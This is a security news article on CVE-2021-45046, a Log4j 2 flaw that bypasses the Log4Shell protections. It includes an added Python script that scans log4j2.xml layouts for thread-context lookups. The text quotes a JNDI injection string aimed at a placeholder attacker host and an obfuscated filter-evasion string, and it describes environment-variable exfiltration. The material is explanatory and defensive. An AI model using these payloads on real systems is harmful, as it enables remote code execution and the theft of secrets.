Another vulnerability found in Log4j 2 that allows malicious code to be executed


It was recently announced that another vulnerability has been identified in the JNDI lookup implementation of the Log4j 2 library (CVE-2021-45046). It manifests despite the fixes added in version 2.15 and regardless of whether the "log4j2.noFormatMsgLookup" setting is used for protection.

The problem is dangerous mainly for older versions of Log4j 2 that are protected with the "noFormatMsgLookup" flag, since it makes it possible to bypass the protection against the previous vulnerability (Log4Shell, CVE-2021-44228), which allows an attacker to run their code on the server.

For users of version 2.15, exploitation is limited to creating conditions for abnormal termination of the application due to exhaustion of the available resources.

The vulnerability only affects systems that use context lookups, such as ${ctx:loginId}, or Thread Context Map (MDC) templates, such as %X, %mdc and %MDC, for logging.

Exploitation comes down to creating conditions in which data containing JNDI substitutions is written to the log when the application uses context lookups or MDC templates, which define the rules for formatting output to the log.

LunaSec researchers noted that for Log4j versions lower than 2.15, this vulnerability can be used as a new vector for a Log4Shell attack, leading to code execution if ThreadContext expressions that include external data are used when writing to the log, regardless of whether the "NoMsgFormatLookups" flag or the "%m{nolookups}" template is set for protection.

The protection bypass comes down to the fact that, instead of a direct substitution of "${jndi:ldap://example.com/a}", this expression is substituted through the value of an intermediate variable used in the rules for formatting log output.

For example, if the context lookup ${ctx:apiversion} is used when writing to the log, the attack can be carried out by substituting the data "${jndi:ldap://attacker.com/a}" into the value written to that variable.
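The following added example, which is not from the original article or from the Log4j project, scans a log4j2.xml configuration for PatternLayout patterns that reference the thread context through ${ctx:...} lookups or the %X, %mdc and %MDC converters, which is the condition this vulnerability depends on. The sample configuration and appender names are constructed, and only XML PatternLayout elements are checked.

```python
import re
import xml.etree.ElementTree as ET

# ${ctx:key} context lookups, and the %X / %mdc / %MDC converters with an
# optional width modifier and {key} argument. Matching is case-sensitive,
# so the unrelated %xEx converter is ignored, as is an escaped %%X.
CTX_LOOKUP = re.compile(r"\$\{ctx:[^}]*\}")
MDC_CONVERTER = re.compile(r"(?<!%)%-?\d*(?:\.\d+)?(?:X|mdc|MDC)(?:\{[^}]*\})?")


def layout_patterns(root):
    """Yield (appender name, pattern string) for every PatternLayout."""
    for appender in root.iter():
        for layout in appender.findall("PatternLayout"):
            pattern = layout.get("pattern")
            if pattern is None:  # pattern given as a child element instead
                pattern = layout.findtext("Pattern") or layout.findtext("pattern") or ""
            yield appender.get("name", appender.tag), pattern


def find_exposed_layouts(config_xml):
    """Return {appender name: sorted thread-context references in its pattern}."""
    findings = {}
    for name, pattern in layout_patterns(ET.fromstring(config_xml)):
        hits = CTX_LOOKUP.findall(pattern) + MDC_CONVERTER.findall(pattern)
        if hits:
            findings[name] = sorted(set(hits))
    return findings


# Constructed sample configuration (not from any real deployment).
SAMPLE_CONFIG = """
<Configuration>
  <Appenders>
    <Console name="Plain">
      <PatternLayout pattern="%d %-5level %c{1} - %m{nolookups}%n%xEx"/>
    </Console>
    <File name="Api" fileName="api.log">
      <PatternLayout pattern="%d ${ctx:apiversion} %X{loginId} - %m{nolookups}%n"/>
    </File>
    <File name="Audit" fileName="audit.log">
      <PatternLayout><Pattern>%d %-10MDC - %m%n</Pattern></PatternLayout>
    </File>
  </Appenders>
</Configuration>
"""

if __name__ == "__main__":
    for appender, refs in find_exposed_layouts(SAMPLE_CONFIG).items():
        print(f"{appender}: {', '.join(refs)}")
```

The "Api" appender is reported even though its pattern uses %m{nolookups}, because that option covers only the message text and not the thread-context values.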

In Log4j 2.15, the vulnerability can be used to carry out a DoS attack by passing values to ThreadContext that cause a loop in the processing of the output format pattern.

To fix the problems encountered, updates 2.16 and 2.12.2 were released to close the vulnerability. In the Log4j 2.16 branch, in addition to the fixes made in version 2.15 and the binding of JNDI LDAP requests to "localhost", JNDI functionality is completely disabled by default and support for message substitutions has been removed.

As a workaround, it is recommended to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").

As for the actions taken by different projects:

For Nginx, a script based on the njs module has been prepared that blocks the transmission of JNDI expressions in HTTP headers, URIs and the body of POST requests. The script can be used on frontend servers to protect backends.

For HAProxy, configuration rules are provided to block exploitation of CVE-2021-44228.

In addition to the previously identified attacks aimed at building a botnet for cryptocurrency mining, the vulnerability in Log4j 2 has been used to spread malicious ransomware that encrypts the contents of disks and demands a ransom for decryption.

Checkpoint identified about sixty different variants of the exploits used in the attacks.

CloudFlare reported that attempts to test for the vulnerability in Log4j were observed on December 1, that is, eight days before the public disclosure of the problem. The first attempts to exploit the vulnerability were recorded only 8 minutes after the information was released. The CloudFlare report also mentions the use of substitutions such as "${env:FOO:-j}ndi:${lower:L}da${lower:P}" to evade the "jndi:ldap" mask, the use of ${env} expressions in attacks to send information about passwords and access keys stored in environment variables to an external server, and ${sys} expressions to collect information about the system.

Finally, if you are interested in learning more about it, you can check the following link.

